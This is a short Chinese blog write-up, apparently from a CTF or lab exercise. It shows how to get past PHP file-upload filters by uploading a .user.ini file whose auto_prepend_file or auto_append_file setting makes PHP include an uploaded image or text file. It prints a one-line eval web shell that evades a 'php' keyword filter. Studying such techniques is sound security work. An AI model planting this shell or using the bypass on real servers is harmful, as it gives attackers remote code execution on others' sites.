文件上传--php user.ini详解

wizard骑士2024-05-07 11:13

文件上传

参考文档：https://www.php.net/manual/zh/configuration.file.per-user.php

如果你的 PHP 以模块化运行在 Apache 里，则用 <var class="filename">.htaccess</var> 文件有同样效果。

auto_prepend_file 表示在每个PHP脚本之前自动加载指定的文件。该文件的内容将被插入到原始脚本的顶部。

auto_prepend_file="shell.png"

auto_append_file 这个是指内容添加到文末，如果有exit会无法调用到

文件上传一

修改后缀--失败

大小写，php3等等--没有显示错误，上传成功

尝试访问图片--没有被解析，下载到了本地

尝试00截断--失败

使用.user.ini 使用auto_prepend_file="shell.png"

上传shell.png

成功

文件上传二：

上传一个普通的png文件：发现路径

上传.user.ini文件使用 auto_append_file="1.txt"

上传1.txt

上传失败疑似是过滤php，使用简写<?=@eval($_POST[x]);?>

成功

上一篇：基于Opencv的车牌识别系统（毕业设计可用）

下一篇：京东科技数字化营销能力的演进与最佳实践| 京东云技术团队

热门推荐

01本地部署DeepSeek教程（Mac版本）02如何在WPS和Word/Excel中直接使用DeepSeek功能 03DeepSeek本地部署详细指南 04太炸裂了！清华大学deepseek从入门到精通使用手册又出第三版了，《普通人如何抓住DeepSeek红利》（无套路，直接下载）05DeepSeek各版本说明与优缺点分析 06DeepSeek r1本地安装全指南 07本地化部署AI知识库：基于Ollama+DeepSeek+AnythingLLM保姆级教程 08DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具 09在Windows下安装Ollama并体验DeepSeek r1大模型 10Page Assist - 本地Deepseek模型 Web UI 的安装和使用